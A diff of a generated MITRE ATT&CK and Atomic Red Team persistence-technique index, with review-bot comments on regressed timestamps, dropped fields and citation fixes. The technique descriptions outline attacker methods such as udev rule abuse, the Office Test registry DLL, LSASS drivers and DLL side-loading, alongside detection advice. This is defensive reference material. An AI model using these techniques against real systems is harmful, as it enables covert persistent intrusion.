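Review bot: the `modified` timestamp for T1543.001 moves backwards here, from 2022-05-11 to 2022-04-21, and the same earlier-date pattern recurs below for T1505, T1547.007, T1574.002, T1037.001, T1547.008 and T1546.007. A `modified` value that regresses usually means the previous index was built from a different (or locally patched) ATT&CK bundle rather than that upstream edited the object; it is worth stating in the commit message which ATT&CK release this regeneration was run against so the provenance of these objects is traceable.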
@@ -38534,7 +38929,6 @@ persistence:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.001
atomic_tests:
- name: Launch Agent
@@ -38655,7 +39049,7 @@ persistence:
sudo rm /tmp/T1543_001_atomicredteam.txt
T1505:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T21:18:29.349Z'
name: Server Software Component
description: 'Adversaries may abuse legitimate extensible development features
of servers to establish persistent access to systems. Enterprise server applications
@@ -38714,33 +39108,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.001:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
- type: attack-pattern
- created: '2020-02-11T19:05:02.399Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.001
- url: https://attack.mitre.org/techniques/T1556/001
- - source_name: Dell Skeleton
- description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
- Retrieved April 8, 2019.
- url: https://www.secureworks.com/research/skeleton-key-malware-analysis
- - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
- June 3, 2016.
- source_name: TechNet Audit Policy
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T15:26:54.386Z'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
@@ -38761,6 +39132,7 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for calls to OpenProcess
that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -38775,52 +39147,42 @@ persistence:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Process: Process Access'
- 'File: File Modification'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1556.005:
- technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
type: attack-pattern
- created: '2022-01-13T20:02:28.349Z'
+ id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ created: '2020-02-11T19:05:02.399Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1556.005
- url: https://attack.mitre.org/techniques/T1556/005
- - source_name: store_pwd_rev_enc
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
- description: Microsoft. (2021, October 28). Store passwords using reversible
- encryption. Retrieved January 3, 2022.
- - source_name: how_pwd_rev_enc_1
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
- description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
- encryption: how it works (part 1). Retrieved November 17, 2021.'
- - source_name: how_pwd_rev_enc_2
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
- description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
- encryption: how it works (part 2). Retrieved November 17, 2021.'
- - source_name: dump_pwd_dcsync
- url: https://adsecurity.org/?p=2053
- description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
- All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1556/001
+ external_id: T1556.001
+ - source_name: Dell Skeleton
+ description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+ Retrieved April 8, 2019.
+ url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+ - source_name: TechNet Audit Policy
+ description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+ June 3, 2016.
+ url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1556.005:
+ technique:
+ modified: '2024-08-26T15:40:31.871Z'
name: Reversible Encryption
description: |-
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption
property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
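Review bot: T1556.001 loses `x_mitre_permissions_required: Administrator` in this hunk with no replacement field, and T1556.005 loses its `User`/`Administrator` entry in the next one. This matches ATT&CK dropping that field in newer releases, but any consumer that filters the index by required privilege level will silently get an empty set; if that filter exists it needs updating in the same change. Separately, the hunk interleaves the deletion of the old T1556.005 block with the rebuilt key order of T1556.001, which makes the diff far larger than the semantic change (`revoked: false`, version `2.0` to `2.1`, attack spec `2.1.0` to `3.2.0`); a generator that preserves a stable key order would keep future regenerations reviewable.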
@@ -38842,6 +39204,7 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor property changes in Group Policy: Computer
Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
Policy\\Store passwords using reversible encryption
. By default, the
@@ -38852,23 +39215,50 @@ persistence:
Directory PowerShell modules, such as Set-ADUser
and Set-ADAccountControl
,
that change account configurations. \n\nMonitor Fine-Grained Password Policies
and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Command: Command Execution'
- 'User Account: User Account Metadata'
- 'Script: Script Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+ created: '2022-01-13T20:02:28.349Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/005
+ external_id: T1556.005
+ - source_name: dump_pwd_dcsync
+ description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+ All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+ url: https://adsecurity.org/?p=2053
+ - source_name: store_pwd_rev_enc
+ description: Microsoft. (2021, October 28). Store passwords using reversible
+ encryption. Retrieved January 3, 2022.
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+ - source_name: how_pwd_rev_enc_1
+ description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+ encryption: how it works (part 1). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+ - source_name: how_pwd_rev_enc_2
+ description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+ encryption: how it works (part 2). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1546.016:
technique:
- modified: '2024-04-12T02:23:44.583Z'
+ modified: '2024-04-28T15:52:44.332Z'
name: Installer Packages
description: |-
Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -38885,7 +39275,7 @@ persistence:
phase_name: persistence
x_mitre_contributors:
- Brandon Dalton @PartyD0lphin
- - Alexander Rodchenko
+ - Rodchenko Aleksandr
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
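Review bot: the contributor rename in this hunk puts the surname first ('Rodchenko Aleksandr'), the opposite of the given-name-first order used for the neighbouring 'Brandon Dalton @PartyD0lphin' and of the correction further down that turns 'Goldstein Menachem' into 'Menachem Goldstein'. Since this file is generated, the inconsistency mirrors upstream ATT&CK data and should be raised there rather than hand-edited here.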
@@ -38944,7 +39334,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.004:
technique:
@@ -39026,7 +39415,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.004
atomic_tests:
- name: rc.common
@@ -39156,12 +39544,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.002
atomic_tests: []
T1136:
technique:
- modified: '2024-01-31T20:46:43.215Z'
+ modified: '2024-10-15T15:53:21.895Z'
name: Create Account
description: |-
Adversaries may create an account to maintain access to victim systems.(Citation: Symantec WastedLocker June 2020) With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
@@ -39184,16 +39571,15 @@ persistence:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- IaaS
- Linux
- macOS
- - Google Workspace
- Network
- Containers
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
@@ -39220,7 +39606,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.013:
technique:
@@ -39289,7 +39674,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.007:
technique:
@@ -39325,7 +39709,7 @@ persistence:
Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist
within the ~/Library/Preferences/ByHost
directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the com.apple.loginwindow.[UUID].plist
file to execute payloads when a user logs in.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T23:46:56.443Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: Re-opened Applications'
x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -39344,7 +39728,6 @@ persistence:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.007
atomic_tests:
- name: Copy in loginwindow.plist for Re-Opened Applications
@@ -39438,7 +39821,7 @@ persistence:
name: sh
T1574.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.241Z'
name: 'Hijack Execution Flow: DLL Side-Loading'
description: |-
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -39488,12 +39871,11 @@ persistence:
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.002
atomic_tests: []
T1098.002:
technique:
- modified: '2024-01-03T15:46:06.706Z'
+ modified: '2024-10-15T15:37:25.303Z'
name: 'Account Manipulation: Additional Email Delegate Permissions'
description: "Adversaries may grant additional permission levels to maintain
persistent access to an adversary-controlled email account. \n\nFor example,
@@ -39526,9 +39908,10 @@ persistence:
x_mitre_contributors:
- Microsoft Detection and Response Team (DART)
- Mike Burns, Mandiant
- - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
- Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
- Arad Inbar, Fidelis Security
+ - Nilesh Dherange (Gurucul)
+ - Naveen Vijayaraghavan
x_mitre_deprecated: false
x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
permissions changes that may indicate excessively broad permissions being
@@ -39545,9 +39928,8 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- - Google Workspace
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Group: Group Modification'
- 'Application Log: Application Log Content'
@@ -39593,12 +39975,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.002
atomic_tests: []
T1653:
technique:
- modified: '2023-09-30T21:28:45.038Z'
+ modified: '2024-10-16T20:11:40.334Z'
name: Power Settings
description: |-
Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.(Citation: Sleep, shut down, hibernate)
@@ -39612,7 +39993,7 @@ persistence:
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
- Juan Tapiador
x_mitre_deprecated: false
x_mitre_detection: "Command-line invocation of tools capable of modifying services
@@ -39671,7 +40052,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.001:
technique:
@@ -39697,7 +40077,7 @@ persistence:
url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
18. Retrieved November 15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:03.153Z'
name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
description: "Adversaries may use Windows logon scripts automatically executed
at logon initialization to establish persistence. Windows allows logon scripts
@@ -39723,13 +40103,11 @@ persistence:
- 'Command: Command Execution'
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1037.001
atomic_tests: []
T1137.002:
technique:
- modified: '2024-04-16T12:41:55.175Z'
+ modified: '2024-10-15T16:01:48.325Z'
name: 'Office Application Startup: Office Test'
description: |-
Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)
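Review bot: T1037.001 loses both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` in this hunk with no corresponding `+` line, unlike T1078.004 and T1556 further down where `x_mitre_attack_spec_version` is re-added earlier in the object. Check that the key still exists elsewhere in the T1037.001 object after regeneration; if not, this entry is the only one in the patch without an ATT&CK spec version, which suggests the generator handled this object's source differently.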
@@ -39753,8 +40131,8 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'Command: Command Execution'
@@ -39784,7 +40162,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1137.002
atomic_tests: []
T1547.008:
@@ -39827,7 +40204,7 @@ persistence:
Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:34:43.405Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: LSASS Driver'
x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -39852,12 +40229,11 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.008
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -39897,8 +40273,10 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -39906,13 +40284,13 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -39943,17 +40321,14 @@ persistence:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests: []
T1053.002:
technique:
- modified: '2023-11-15T14:38:10.876Z'
+ modified: '2024-10-12T15:53:12.333Z'
name: 'Scheduled Task/Job: At'
description: |-
- Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+ Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow
file. If the at.allow
file does not exist, the at.deny
file is checked. Every username not listed in at.deny
is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny
exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
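Review bot: the T1053.002 description change at the end of this hunk is a whole-line replacement of one very long line; the only new text is the closing sentence about scheduling a job through the `Win32_ScheduledJob` WMI class and its `(Citation: Malicious Life by Cybereason)` reference, which a word-level diff would show directly. That addition matters for detection content built from this index: a process-creation rule keyed on `at.exe` will not see jobs created through WMI, so the 'Scheduled Job: Scheduled Job Creation' data source listed for this technique is the one that covers both paths.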
@@ -40016,7 +40391,7 @@ persistence:
- Windows
- Linux
- macOS
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Scheduled Job: Scheduled Job Creation'
@@ -40050,8 +40425,8 @@ persistence:
url: https://man7.org/linux/man-pages/man1/at.1p.html
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
@@ -40060,6 +40435,10 @@ persistence:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Malicious Life by Cybereason
+ description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+ the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+ url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
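Review bot: the new 'Malicious Life by Cybereason' reference URL ends in a `#blog-subscribe` fragment, which anchors to the page's subscription widget rather than to the article text. The value comes from upstream ATT&CK data, so the fix belongs there, but the regeneration is a good point to file it; the entry is otherwise consistent with the citation added to the T1053.002 description above.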
@@ -40072,12 +40451,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.002
atomic_tests: []
T1556:
technique:
- modified: '2024-04-11T21:51:44.851Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Modify Authentication Process
description: |-
Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -40090,6 +40468,7 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Chris Ross @xorrior
x_mitre_deprecated: false
@@ -40126,17 +40505,17 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Network
- - Azure AD
- - Google Workspace
- IaaS
- - Office 365
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Process: Process Access'
@@ -40182,9 +40561,65 @@ persistence:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ atomic_tests: []
+ T1546.017:
+ technique:
+ modified: '2024-11-11T19:05:38.708Z'
+ name: Udev Rules
+ description: |-
+ Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+ Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Eduardo González Hernández (@codexlynx)
+ - Eder Pérez Ignacio, @ch4ik0
+ - Wirapong Petshagun
+ - "@grahamhelton3"
+ - Ruben Groenewoud, Elastic
+ x_mitre_deprecated: false
+ x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+ in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+ specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+ 2024) '
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'File: File Modification'
+ type: attack-pattern
+ id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+ created: '2024-09-26T17:02:09.888Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/017
+ external_id: T1546.017
+ - source_name: Ignacio Udev research 2024
